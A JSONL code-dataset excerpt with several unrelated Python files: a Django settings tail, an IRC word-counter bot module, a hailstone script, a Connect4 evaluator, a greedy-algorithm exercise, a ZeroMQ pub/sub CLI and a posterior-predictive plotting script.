\"POST\" requests\nCSRF_TRUSTED_ORIGINS = [\n 'https://quantum-coasters.uc.r.appspot.com',\n]\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n # 'DIRS': [[os.path.join(BASE_DIR, \"quantumadminapp\")],],\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n 'social_django.context_processors.backends',\n 'social_django.context_processors.login_redirect',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'quantumapp.wsgi.application'\n\n\n# Database\n# https://docs.djangoproject.com/en/3.0/ref/settings/#databases\n# Use django-environ to parse the connection string\n# DATABASES = {\"default\": env.db()}\n# print(env.db())\n# DATABASE_URL = os.environ.get('DATABASE_URL')\n# DATABASES = {\n# 'default' : {\n# 'ENGINE': 'django.db.backends.postgresql',\n# 'NAME': os.environ.get('CLOUD_SQL_DATABASE_NAME'),\n# 'USER': os.environ.get('CLOUD_SQL_USERNAME'),\n# 'PASSWORD': os.environ.get('CLOUD_SQL_PASSWORD'),\n# 'HOST': os.environ.get('CLOUD_SQL_HOST'),\n# # 'PORT': 5432,\n# }\n# }\n\nDATABASE_URL=os.environ.get('DATABASE_URL')\nDATABASES = {\"default\": env.db()}\n\n# If the flag as 
been set, configure to use proxy\nif os.getenv(\"USE_CLOUD_SQL_AUTH_PROXY\", None):\n DATABASES[\"default\"][\"HOST\"] = \"127.0.0.1\"\n DATABASES[\"default\"][\"PORT\"] = 5432\n\n\n# if os.environ.get(\"USE_CLOUD_SQL_AUTH_PROXY\") and ENVIRONMENT == 'local':\n# DATABASE_URL=os.environ.get('DATABASE_URL')\n# DATABASES = {\n# 'default' : {\n# 'ENGINE': 'django.db.backends.postgresql',\n# 'NAME': os.environ.get('CLOUD_SQL_DATABASE_NAME'),\n# # 'NAME': os.environ.get('CLOUD_SQL_CONNECTION_NAME'),\n# 'USER': os.environ.get('CLOUD_SQL_USERNAME'),\n# 'PASSWORD': os.environ.get('CLOUD_SQL_PASSWORD'),\n# 'HOST': \"127.0.0.1\",\n# 'PORT': 5432,\n# }\n# }\n# else:\n# DATABASE_URL=os.environ.get('DATABASE_URL')\n# DATABASES = {\n# 'default' : {\n# 'ENGINE': 'django.db.backends.postgresql',\n# 'NAME': os.environ.get('CLOUD_SQL_DATABASE_NAME'),\n# 'USER': os.environ.get('CLOUD_SQL_USERNAME'),\n# 'PASSWORD': os.environ.get('CLOUD_SQL_PASSWORD'),\n# 'HOST': os.environ.get('CLOUD_SQL_HOST'),\n# # 'PORT': 5432,\n# }\n# }\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\n\n# Internationalization\n# https://docs.djangoproject.com/en/3.0/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/3.0/howto/static-files/\n\nMEDIA_URL = '/media/'\nMEDIA_ROOT = os.path.join(BASE_DIR, \"media/\")\n\nSTATIC_URL = '/static/'\n# STATICFILES_DIRS = [\n# os.path.join(BASE_DIR, \"quantumforum/static\"),\n# os.path.join(BASE_DIR, \"quantumadmin/static\"),\n# ]\nSTATIC_ROOT = os.path.join(BASE_DIR, \"static\")\n\n\n# For Quantum Coasters React app\nLOGIN_URL = os.environ.get('LOGIN_URL')\nLOGIN_REDIRECT_URL = os.environ.get('LOGIN_REDIRECT_URL')\nLOGOUT_URL = os.environ.get('LOGOUT_URL')\nLOGOUT_REDIRECT_URL = os.environ.get('LOGOUT_REDIRECT_URL')\n\n# QuantumAdminApp\nQUANTUMADMIN_REGISTER_URL = os.environ.get('QUANTUMADMIN_REGISTER_URL')\n\n# Social Auth Configs (For Django full stack app)\n# https://readthedocs.org/projects/python-social-auth/downloads/pdf/latest/\n# https://python-social-auth.readthedocs.io/en/latest/configuration/django.html\n\n# The OpenID backend will check for a username key in the values returned by the server, but default to first-name\n# + last-name if that key is missing. 
It’s possible to indicate the username key in the values If the username is under\n# a different key with a setting, but backends should have defined a default value.\n# SOCIAL_AUTH_FEDORA_USERNAME_KEY = 'email'\n\n# authorize endpoint in Auth0 backend to authorize user.\nSOCIAL_AUTH_LOGIN_URL = os.environ.get('SOCIAL_AUTH_LOGIN_URL')\n\n\n\nSOCIAL_AUTH_LOGIN_REDIRECT_URL = os.environ.get('SOCIAL_AUTH_LOGIN_REDIRECT_URL')\nSOCIAL_AUTH_NEW_ASSOCIATION_REDIRECT_URL = os.environ.get('SOCIAL_AUTH_NEW_ASSOCIATION_REDIRECT_URL')\n\nSOCIAL_AUTH_URL_NAMESPACE = 'social'\nSOCIAL_AUTH_ADMIN_USER_SEARCH_FIELDS = [\n 'username', 'first_name', 'last_name', 'email'\n]\n\nSOCIAL_AUTH_USER_MODEL = 'quantumapi.User'\nSOCIAL_AUTH_USERNAME_IS_FULL_EMAIL = True\nSOCIAL_AUTH_CLEAN_USERNAMES = True\n# SOCIAL_AUTH_PROTECTED_USER_FIELDS = os.environ.get('SOCIAL_AUTH_PROTECTED_USER_FIELDS')\n# SOCIAL_AUTH_AUTH0_WHITELISTED_DOMAINS = os.environ.get('SOCIAL_AUTH_AUTH0_WHITELISTED_DOMAINS')\n# SOCIAL_AUTH_AUTH0_WHITELISTED_DOMAINS = os.environ.get('SOCIAL_AUTH_AUTH0_WHITELISTED_DOMAINS')\n\n# SOCIAL_AUTH_POSTGRES_JSONFIELD = True\nSOCIAL_AUTH_JSONFIELD_ENABLED = True\nSOCIAL_AUTH_STRATEGY = 'social_django.strategy.DjangoStrategy'\nSOCIAL_AUTH_STORAGE = 'social_django.models.DjangoStorage'\n\nSOCIAL_AUTH_PIPELINE = (\n 'social_core.pipeline.social_auth.social_details',\n 'social_core.pipeline.social_auth.social_uid',\n 'social_core.pipeline.social_auth.auth_allowed',\n 'social_core.pipeline.social_auth.social_user',\n 'social_core.pipeline.user.get_username',\n 'social_core.pipeline.mail.mail_validation',\n 'social_core.pipeline.social_auth.associate_by_email',\n 'social_core.pipeline.user.create_user',\n 'social_core.pipeline.social_auth.associate_user',\n 'social_core.pipeline.social_auth.load_extra_data',\n 'social_core.pipeline.user.user_details',\n 'social_core.pipeline.debug.debug',\n)\n\n# Django All-Auth Settings (SocialAccount)\n# https://django-allauth.readthedocs.io/en/latest/configuration.html\n\nSOCIALACCOUNT_PROVIDERS = {\n 'auth0': {\n 'AUTH0_URL': os.environ.get('SOCIALACCOUNT_DOMAIN'),\n \"VERIFIED_EMAIL\": True\n }\n}\n\nACCOUNT_USER_MODEL_USERNAME_FIELD = 'email'\nACCOUNT_EMAIL_REQUIRED = True\nACCOUNT_UNIQUE_EMAIL = True\nACCOUNT_USERNAME_REQUIRED = True\nSOCIALACCOUNT_STORE_TOKENS = True\n\n# Email verification\n# https://django-allauth.readthedocs.io/en/latest/views.html#e-mail-verification\n# https://django-allauth.readthedocs.io/en/latest/views.html#e-mails-management-account-email\nACCOUNT_AUTHENTICATION_METHOD = 'email'\nACCOUNT_EMAIL_VERIFICATION = 'optional'\nSOCIALACCOUNT_EMAIL_VERIFICATION = ACCOUNT_EMAIL_VERIFICATION\nACCOUNT_CONFIRM_EMAIL_ON_GET = True\nACCOUNT_EMAIL_CONFIRMATION_ANONYMOUS_REDIRECT_URL = '/?verification=1'\nACCOUNT_EMAIL_CONFIRMATION_AUTHENTICATED_REDIRECT_URL = '/?verification=1'\n# ACCOUNT_CONFIRM_EMAIL_ON_GET = False\n# ACCOUNT_EMAIL_CONFIRMATION_ANONYMOUS_REDIRECT_URL = 'None'\n# ACCOUNT_EMAIL_CONFIRMATION_AUTHENTICATED_REDIRECT_URL = 'None'\n\n# Used to override forms, for example: {'signup': 'myapp.forms.SignupForm'}\n# SOCIALACCOUNT_FORMS = {}\n\nEMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'\nREST_AUTH_SERIALIZERS = {\n 'USER_DETAILS_SERIALIZER': 'quantumapi.views.UserSerializer'\n}\nREST_SESSION_LOGIN = True\n\n# Django only sends a cookie if it needs to. 
If you don’t set any session data, it won’t send a session cookie, unless this is set to true.\nSESSION_SAVE_EVERY_REQUEST = True\n\n# When doing dumpdata, specifies fixture dir to put fixture in. *Comment out when running loaddata or will throw error bc it duplicates.\nFIXTURE_DIRS = '/Users/matthewcrook/code/nss/frontEnd/quantumapp/quantumapi/fixtures'\n\n# Setting Django's primary key type creation (this will exempt migrations)\nDEFAULT_AUTO_FIELD = 'django.db.models.AutoField'\n\n# Same but is a 64-bit integer, much like an AutoField except that it is guaranteed to fit numbers from 1 to 9223372036854775807.\n# DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'\n\n# CORS_ORIGIN_ALLOW_ALL = True\n# CORS_ALLOW_CREDENTIALS = True\n","sub_path":"quantumapp/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":17157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"151864267","text":"from twisted.plugin import IPlugin\nfrom heufybot.channel import IRCChannel\nfrom heufybot.moduleinterface import IBotModule\nfrom heufybot.modules.commandinterface import BotCommand\nfrom heufybot.utils import networkName\nfrom zope.interface import implements\nimport operator\n\n\nclass WordCounterCommand(BotCommand):\n implements(IPlugin, IBotModule)\n\n name = \"WordCounter\"\n commandUsed = False\n\n def triggers(self):\n return [\"addwordcount\", \"remwordcount\", \"wordcount\"]\n\n def actions(self):\n return super(WordCounterCommand, self).actions() + [\n (\"message-channel\", 1, self.countMessage),\n (\"ctcp-message\", 1, self.countAction) ]\n\n def load(self):\n self.help = \"Commands: addwordcount , remwordcount , wordcount | Add or remove a word that\" \\\n \" should be counted in the channel or request how many times a given word has been said.\"\n self.commandHelp = {\n \"addwordcount\": \"addwordcount | Add a word to be counted.\",\n \"remwordcount\": \"remwordcount | Remove a word that is being counted.\",\n \"wordcount\": \"wordcount | Request how many times a given word has been said.\"\n }\n if \"wordcounts\" not in self.bot.storage:\n self.bot.storage[\"wordcounts\"] = {}\n self.wordCounters = self.bot.storage[\"wordcounts\"]\n\n def checkPermissions(self, server, source, user, command):\n if command == \"addwordcount\" or command == \"remwordcount\":\n return not self.bot.moduleHandler.runActionUntilFalse(\"checkadminpermission\", server, source, user,\n \"word-counter\")\n else:\n return True\n\n def execute(self, server, source, command, params, data):\n self.commandUsed = True\n if \"channel\" not in data:\n self.replyPRIVMSG(server, source, \"Word counters can only be used in channels.\")\n return\n if len(params) < 1:\n self.replyPRIVMSG(server, source, \"You didn't specify a word.\")\n return\n network = networkName(self.bot, server)\n if network not in self.wordCounters:\n self.wordCounters[network] = {}\n if source not in self.wordCounters[network]:\n self.wordCounters[network][source] = {}\n word = params[0].lower()\n if command == \"addwordcount\":\n if word in self.wordCounters[network][source]:\n self.replyPRIVMSG(server, source, \"A counter for {!r} already exists.\".format(word))\n else:\n self.wordCounters[network][source][word] = {}\n self.bot.storage[\"wordcounts\"] = self.wordCounters\n self.replyPRIVMSG(server, source, \"A counter for {!r} has been added.\".format(word))\n elif command == \"remwordcount\":\n if word in self.wordCounters[network][source]:\n del 
self.wordCounters[network][source][word]\n self.bot.storage[\"wordcounts\"] = self.wordCounters\n self.replyPRIVMSG(server, source, \"The counter for {!r} has been removed.\".format(word))\n\n else:\n self.replyPRIVMSG(server, source, \"A counter for {!r} does not exist.\".format(word))\n elif command == \"wordcount\":\n self.commandUsed = True\n if word not in self.wordCounters[network][source]:\n self.replyPRIVMSG(server, source, \"A counter for {!r} does not exist.\".format(word))\n return\n total = sum(self.wordCounters[network][source][word].itervalues())\n result = \"The word {!r} has been said {} times.\".format(word, total)\n if total > 0:\n top = max(self.wordCounters[network][source][word].iteritems(), key=operator.itemgetter(1))\n result = \"{} The top contributor is {} with {} times.\".format(result, top[0], top[1])\n self.replyPRIVMSG(server, source, result)\n\n def countMessage(self, server, channel, user, body):\n self._countWords(networkName(self.bot, server), channel.name, user.nick, body)\n\n def countAction(self, server, source, user, body):\n if body.upper().startswith(\"ACTION\") and isinstance(source, IRCChannel):\n self._countWords(networkName(self.bot, server), source.name, user.nick, body)\n\n def _countWords(self, server, source, user, body):\n if self.commandUsed:\n self.commandUsed = False\n return\n if server not in self.wordCounters:\n return\n if source not in self.wordCounters[server]:\n return\n for word, users in self.wordCounters[server][source].iteritems():\n if word in body:\n if user in users:\n self.wordCounters[server][source][word][user] += 1\n else:\n self.wordCounters[server][source][word][user] = 1\n self.bot.storage[\"wordcounts\"] = self.wordCounters\n\n\nwordCounter = WordCounterCommand()\n","sub_path":"heufybot/modules/commands/wordcounter.py","file_name":"wordcounter.py","file_ext":"py","file_size_in_byte":5052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"566202905","text":"# Hailstone program\n\ndef hail(first):\n \"\"\"\n This function returns a list whose items are the\n hailstone sequence whose first term is (first).\n \"\"\"\n hail = []\n while first != 1:\n hail.append(first)\n if first%2 == 0:\n next_term = first//2\n first = next_term\n else: \n next_term = first*3+1\n first = next_term\n return hail\ns = hail(5)\nprint(s)","sub_path":"hailstone.py","file_name":"hailstone.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"589721376","text":"from connect4 import Connect4\nfrom bits import sparse_bit_count\n\nSIDE_TO_MOVE = 10\nFACTOR_3 = 18\n\nLOSS_SCORE = -10000\n \ndef shifts4(state, mask, direction):\n\tmask &= mask << (2 * direction)\n\tmask &= mask << direction\n\treturn mask\n \ndef strech4(state, mask, direction):\n\tmask |= mask >> (2 * direction)\n\tmask |= mask >> direction\n\treturn mask\n\ndef evaluate(state):\n\tscore = SIDE_TO_MOVE\n\tscore += direction(state, state._up)\n\tscore += direction(state, state._right)\n\tscore += direction(state, state._right_up)\n\tscore += direction(state, state._right_down)\n\treturn score\n\ndef direction(state, i):\n\tcurrent_player = state.current_player()\n\topponent = state.opponent()\n\town_tokens = state._player_tokens[current_player]\n\topponent_tokens = state._player_tokens[opponent]\n\t\n\tscore = 0\n\twin_positions = shifts4(state, state._full_board & ~opponent_tokens, i)\n\twin_fields = strech4(state, win_positions, 
i)\n\ttokens = own_tokens\n\ttokens &= tokens << i\n\tscore += sparse_bit_count(win_fields & tokens)\n\ttokens &= tokens << i\n\tscore += FACTOR_3 * sparse_bit_count(win_fields & tokens)\n \n\twin_positions = shifts4(state, state._full_board & ~own_tokens, i)\n\twin_fields = strech4(state, win_positions, i)\n\ttokens = opponent_tokens\n\ttokens &= tokens << i\n\tscore -= sparse_bit_count(win_fields & tokens)\n\ttokens &= tokens << i\n\tscore -= FACTOR_3 * sparse_bit_count(win_fields & tokens)\n\treturn score\n","sub_path":"python/evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":1399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"518247983","text":"import heapq\n\nfood_times= [8,6,4] \nk = 15\n# def solution(food_times, k):\n # 전체 음식을 먹는 시간보다 k가 크거나 같다면 -1\nif sum(food_times) <=k :\n print(-1)\n\n # 시간이 작은 음식부터 빼야 하므로 우선순위 큐를 이용\nq =[]\nfor i in range(len(food_times)):\n # (음식시간, 음식번호) 형태로 우선순위 큐에 삽입\n heapq.heappush(q,(food_times[i],i+1)) # foodtimes 를 기준으로 정렬됨\n \nsum_value =0 # 먹기 위해 사용한 시간 \nprevious =0 # 직전에 다먹은 음식시간\nlength = len(food_times)# 남은 음식 개수\n\n # sum_value +(현재의 음식 시간+ 이전 음식 시간)* 현재 음식 개수와 k비교\nwhile sum_value+((q[0][0]- previous)* length) <=k:\n now = heapq.heappop(q)[0]\n sum_value += (now- previous) * length # 이전음식 먹은 시간만큼 지금 음식도 없어졌을테니까 \n length -= 1 # 다먹은 음식 제외\n previous = now # 이전 음식 시간 재설정\n\n # 남은 음식중에서 몇 번째 음식인지 확인하여 출력\nresult = sorted(q,key= lambda x : x[1]) # 음식의 번호 기준으로 정렬\nprint(result[(k- sum_value)% length][1])\n\n \n","sub_path":"이코테/greedy/실전문제/6.무지의먹방라이브.py","file_name":"6.무지의먹방라이브.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"59642602","text":"#!/usr/bin/env /usr/local/bin/python /usr/bin/python\n# encoding: utf-8\n# FileName: PubSub.py\n#\n# CS6381 Assignment\n# Group member: Peng Manyao, Li Yingqi, Zhou Minhui, Zhuangwei Kang\n#\n\nfrom Broker import Broker\nfrom Subscriber import Subscriber\nfrom Publisher import Publisher\nimport time\n\npubsub_version = '0.1'\npubsub_info = 'Dev MyPublisher/MySubscriber system based on ZeroMQ'\n\n\ndef help():\n print('pubsub: ')\n print('usage: pubsub [opt] [argv]')\n print('usage: pubsub -h')\n print('usage: pubsub -v')\n print('****************************')\n print(' pub -r [address] -P [port] -t [topic] # register publisher to an address with a port number'\n 'and set its initial topic')\n print(' pub send -t [topic] -p [publication] # send publication with topic')\n print(' pub -d [topic] # drop a topic')\n print(' pub shutoff')\n print('****************************')\n print(' broker -l [xsubsocket port] [xpubsocket port] # listen connections at these two ports')\n print('****************************')\n print(' sub -r [address] -P [port] -t [topic] -h [history samples count] # register subscriber to an '\n 'address with a port number and set its initial topic and history samples count')\n\n print('****************************')\n print('exit # exit program')\npub = None\nbroker = None\nsub = None\n\n\ndef parse(argv):\n opt = argv[0]\n global pub\n global broker\n global sub\n if opt == 'pub':\n if argv[1] == '-r' and argv[3] == '-P' and argv[5] == '-t':\n if pub is None:\n address = argv[2]\n port = argv[4]\n topic = argv[6]\n pub = Publisher(address, port, topic)\n if pub.register_handler():\n return True\n else:\n return False\n else:\n print('You already registered a publisher.')\n return False\n elif argv[1] == 
'send' and argv[2] == '-t' and argv[4] == '-p':\n if pub is None:\n print('Please register a publisher firstly.')\n return False\n else:\n topic = argv[3]\n publication = ' '.join(argv[5:])\n pub.send_pub(topic, publication)\n elif argv[1] == '-d':\n if pub is None:\n print('Please register a publisher firstly.')\n return False\n else:\n topic = argv[2]\n pub.drop_topic(topic)\n elif argv[1] == 'shutoff':\n if pub is None:\n print('Please register a publisher firstly.')\n return False\n else:\n pub.shutoff()\n return True\n else:\n print('Illegal command.')\n return False\n\n elif opt == 'broker':\n if argv[1] == '-l':\n xsubport = argv[2]\n xpubport = argv[3]\n broker = Broker(xsubport, xpubport)\n broker.handler()\n else:\n print('Illegal command.')\n return False\n\n elif opt == 'sub':\n if argv[1] == '-r' and argv[3] == '-P' and argv[5] == '-t' and argv[7] == '-h':\n address = argv[2]\n port = argv[4]\n topic = argv[6]\n count = argv[8]\n sub = Subscriber(address, port, topic, count)\n sub.prepare()\n sub.handler()\n else:\n print('Illegal command.')\n return False\n else:\n print('Illegal command.')\n return False\n\n\nif __name__ == '__main__':\n\n while True:\n time.sleep(0.1)\n lcmd = raw_input('PubSub>> ')\n if lcmd == 'exit':\n break\n try:\n lcmd = lcmd.split()\n if lcmd[0] != 'pubsub':\n print('Illegal command.')\n continue\n opt = lcmd[1]\n\n # help info and version info\n if opt == '-h' or opt == 'help':\n help()\n continue\n elif opt == '-v' or opt == 'version':\n print('PubSub current version is: %s' % pubsub_version)\n print('PubSub info is: %s' % pubsub_info)\n continue\n ret = parse(lcmd[1:])\n if ret is False:\n print('Service failed.')\n except IndexError:\n print('Illegal command.')\n","sub_path":"Assignment1/SourceCode/PubSub.py","file_name":"PubSub.py","file_ext":"py","file_size_in_byte":4444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"522154215","text":"#!/usr/bin/env python3\nfrom __future__ import print_function\nimport sys\nsys.path.append('./method')\nimport os\nimport numpy as np\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport pints.io\nimport pints.plot\nfrom scipy.interpolate import interp1d\nfrom scipy.stats import norm as scipy_stats_norm\n\n\"\"\"\nPosterior predictives with different discrepancy models.\n\nThis script plots the cached posterior predictives generated by `posterior.py`,\n`posterior-gp.py`, and `posterior-arma.py`.\n\"\"\"\n\nmodel_list = ['A', 'B', 'C']\npredict_list = ['sinewave', 'staircase', 'ap']\ndiscrepancy_list = ['', '-gp', '-gp-ov', '-arma_2_2']\nload_list = ['-iid', '-gp', '-gp', '-armax']\ndiscrepancy_names = ['iid noise', 'GP(t)', 'GP(O, V)', 'ARMA(2, 2)']\n\ntry:\n which_model = sys.argv[1] \n which_predict = sys.argv[2]\nexcept:\n print('Usage: python %s [str:which_model]' % os.path.basename(__file__)\n + ' [str:which_predict]')\n sys.exit()\n\nif which_model not in model_list:\n raise ValueError('Input model %s is not available in the model list' \\\n % which_model)\n\nif which_predict not in predict_list:\n raise ValueError('Input data %s is not available in the predict list' \\\n % which_predict)\n\ninfo_id = 'model_%s' % which_model\nsavedir = './fig/compare'\nif not os.path.isdir(savedir):\n os.makedirs(savedir)\nsaveas = 'compare-' + info_id + '-sinewave-%s-pp' % which_predict\n\nif which_predict == 'sinewave':\n zoom = [-1250, 800]\nelif which_predict == 'staircase':\n zoom = [-600, 1600]\nelif which_predict == 'ap':\n zoom 
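The command parser above drives project-specific `Publisher`/`Broker`/`Subscriber` wrappers whose internals are not shown here; underneath they are plain ZeroMQ pub/sub. A minimal sketch of that pattern with pyzmq (the port is hypothetical, and note that a SUB socket must be connected and subscribed *before* the PUB side sends, or the frame is silently dropped):

```python
import zmq

def run_subscriber(topic, port=5556):
    """Connect a SUB socket filtered to `topic` and block for one message."""
    ctx = zmq.Context.instance()
    sub = ctx.socket(zmq.SUB)
    sub.connect("tcp://localhost:%d" % port)
    sub.setsockopt_string(zmq.SUBSCRIBE, topic)
    return sub.recv_string()

def run_publisher(topic, message, port=5556):
    """Bind a PUB socket and send one space-delimited 'topic payload' frame."""
    ctx = zmq.Context.instance()
    pub = ctx.socket(zmq.PUB)
    pub.bind("tcp://*:%d" % port)
    pub.send_string("%s %s" % (topic, message))
```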
= [-200, 4200]\n\ndata_dir = './data'\ndata_file_name = 'data-%s.csv' % which_predict\nprint('Predicting ', data_file_name)\n\n# Load data\ndata = np.loadtxt(data_dir + '/' + data_file_name,\n delimiter=',', skiprows=1) # headers\ntimes = data[:, 0]\ndata = data[:, 1]\n\n# Load protocol\nprotocol = np.loadtxt('./protocol-time-series/%s.csv' % which_predict,\n skiprows=1, delimiter=',')\nprotocol_times = protocol[:, 0]\nprotocol = protocol[:, 1]\nvoltage = interp1d(protocol_times, protocol, kind='linear')(times)\n\n# Load cached posterior prediction\ntimes_list = []\nppc_mean_list = []\nppc_sd_list = []\nppc_model_mean_list = []\nppc_model_sd_list = []\nppc_disc_mean_list = []\nppc_disc_sd_list = []\nfor i, (d, l) in enumerate(zip(discrepancy_list, load_list)):\n loaddir = './fig/mcmc-' + info_id + d + '/raw'\n loadas = info_id + '-sinewave-' + which_predict\n times_list.append(np.loadtxt('%s/%s-pp-time.txt' % (loaddir, loadas)))\n\n ppc_mean_list.append(np.loadtxt('%s/%s-pp%s-mean.txt'\n % (loaddir, loadas, l)))\n ppc_sd_list.append(np.loadtxt('%s/%s-pp%s-sd.txt' % (loaddir, loadas, l)))\n\n ppc_model_mean_list.append(np.loadtxt('%s/%s-pp-only-model-mean.txt'\n % (loaddir, loadas)))\n ppc_model_sd_list.append(np.loadtxt('%s/%s-pp-only-model-sd.txt'\n % (loaddir, loadas)))\n\n ppc_disc_mean_list.append(np.loadtxt('%s/%s-pp-only%s-mean.txt'\n % (loaddir, loadas, l)))\n ppc_disc_sd_list.append(np.loadtxt('%s/%s-pp-only%s-sd.txt'\n % (loaddir, loadas, l)))\n\nn_sd = scipy_stats_norm.ppf(1. - .05 / 2.)\n\n# Plot model + discrepancy\nif (which_model == 'A') and (which_predict in ['sinewave', 'staircase']):\n fig, axes = plt.subplots(len(discrepancy_list) + 1, 1, sharex=True,\n figsize=(8, 5),\n gridspec_kw={'height_ratios': [1] + [2] * len(discrepancy_list)})\n axes[0].plot(times, voltage, c='#7f7f7f')\n axes[0].set_ylabel('Voltage\\n(mV)')\n axes[0].set_title('ODE model with discrepancy', loc='left')\n axes[0].set_xlim((times[0], times[-1]))\n for i, d in enumerate(discrepancy_names):\n ppc_mean = ppc_mean_list[i]\n ppc_sd = ppc_sd_list[i]\n a = 0.5 #- i * 0.25\n axes[i + 1].plot(times, data, alpha=0.5, c='#7f7f7f', label='Data')\n axes[i + 1].plot(times, ppc_mean, c='C' + str(i), alpha=0.9, lw=0.5,\n label=d)# + ' mean')\n axes[i + 1].fill_between(times,\n ppc_mean - n_sd * ppc_sd,\n ppc_mean + n_sd * ppc_sd,\n facecolor='C' + str(i), linewidth=0, alpha=a,)\n #label=d + ' 95% C.I.')\n if which_predict in ['sinewave']:\n axes[i + 1].legend(loc=3)\n elif which_predict in ['staircase']:\n axes[i + 1].legend(loc=2, ncol=2)\n axes[i + 1].set_ylabel('Current\\n(pA)')\n axes[i + 1].set_ylim(zoom)\n axes[i + 1].set_xlim((times[0], times[-1]))\n # Add arrows...\n if which_predict == 'staircase':\n for i in range(1, 5):\n axes[i].annotate(\"\", xy=(2500, 200), xytext=(3250, 600),\n arrowprops=dict(arrowstyle=\"->\", color='#cb181d'))\n axes[i].annotate(\"\", xy=(14750, 200), xytext=(14750, 1050),\n arrowprops=dict(arrowstyle=\"->\", color='#cb181d'))\n axes[2].annotate(\"\", xy=(7550, 500), xytext=(8300, 900),\n arrowprops=dict(arrowstyle=\"->\", color='#0570b0'))\n axes[-1].set_xlabel('Time (ms)')\n plt.subplots_adjust(hspace=0)\n plt.savefig('%s/%s' % (savedir, saveas), dpi=200, bbox_inches='tight')\n plt.close()\nelse:\n fig, axes = plt.subplots(len(discrepancy_list) + 1, 1, sharex=True,\n figsize=(8, 8),\n gridspec_kw={'height_ratios': [1] + [2] * len(discrepancy_list)})\n axes[0].plot(times, voltage, c='#7f7f7f')\n axes[0].set_ylabel('Voltage (mV)')\n axes[0].set_title('ODE model with discrepancy', 
loc='left')\n for i, d in enumerate(discrepancy_names):\n ppc_mean = ppc_mean_list[i]\n ppc_sd = ppc_sd_list[i]\n a = 0.5 #- i * 0.25\n axes[i + 1].plot(times, data, alpha=0.5, c='#7f7f7f', label='Data')\n axes[i + 1].plot(times, ppc_mean, c='C' + str(i), alpha=0.9, lw=0.5,\n label=d + ' mean')\n axes[i + 1].fill_between(times,\n ppc_mean - n_sd * ppc_sd,\n ppc_mean + n_sd * ppc_sd,\n facecolor='C' + str(i), linewidth=0, alpha=a,\n label=d + ' 95% C.I.')\n axes[i + 1].legend()\n axes[i + 1].set_ylabel('Current (pA)')\n axes[i + 1].set_ylim(zoom)\n axes[-1].set_xlabel('Time (ms)')\n plt.subplots_adjust(hspace=0)\n plt.savefig('%s/%s' % (savedir, saveas), dpi=200, bbox_inches='tight')\n plt.close()\n\n# Plot model only\nfig, axes = plt.subplots(len(discrepancy_list) + 1, 1, sharex=True,\n figsize=(8, 8),\n gridspec_kw={'height_ratios': [1] + [2] * len(discrepancy_list)})\naxes[0].plot(times, voltage, c='#7f7f7f')\naxes[0].set_ylabel('Voltage (mV)')\naxes[0].set_title('ODE model only', loc='left')\nfor i, d in enumerate(discrepancy_names):\n ppc_mean = ppc_model_mean_list[i]\n ppc_sd = ppc_model_sd_list[i]\n a = 0.5 #- i * 0.25\n axes[i + 1].plot(times, data, alpha=0.5, c='#7f7f7f', label='Data')\n axes[i + 1].plot(times, ppc_mean, c='C' + str(i), alpha=0.9, lw=0.5,\n label=d + ' mean')\n axes[i + 1].fill_between(times,\n ppc_mean - n_sd * ppc_sd,\n ppc_mean + n_sd * ppc_sd,\n facecolor='C' + str(i), linewidth=0, alpha=a,\n label=d + ' 95% C.I.')\n axes[i + 1].legend()\n axes[i + 1].set_ylabel('Current (pA)')\n axes[i + 1].set_ylim(zoom)\naxes[-1].set_xlabel('Time (ms)')\nplt.subplots_adjust(hspace=0)\nplt.savefig('%s/%s-only-model' % (savedir, saveas), dpi=200,\n bbox_inches='tight')\nplt.close()\n\n# Plot discrepancy only\nfig, axes = plt.subplots(len(discrepancy_list) + 1, 1, sharex=True,\n figsize=(8, 8),\n gridspec_kw={'height_ratios': [1] + [2] * len(discrepancy_list)})\naxes[0].plot(times, voltage, c='#7f7f7f')\naxes[0].set_ylabel('Voltage (mV)')\naxes[0].set_title('Discrepancy only', loc='left')\nfor i, d in enumerate(discrepancy_names):\n ppc_mean = ppc_disc_mean_list[i]\n ppc_sd = ppc_disc_sd_list[i]\n a = 0.5 #- i * 0.25\n axes[i + 1].plot(times, data - ppc_model_mean_list[i], alpha=0.5,\n c='#7f7f7f', label='Data - ODE model')\n axes[i + 1].plot(times, ppc_mean, c='C' + str(i), alpha=0.9, lw=0.5,\n label=d + ' mean')\n axes[i + 1].fill_between(times,\n ppc_mean - n_sd * ppc_sd,\n ppc_mean + n_sd * ppc_sd,\n facecolor='C' + str(i), linewidth=0, alpha=a,\n label=d + ' 95% C.I.')\n axes[i + 1].legend()\n axes[i + 1].set_ylabel('Current (pA)')\n #axes[i + 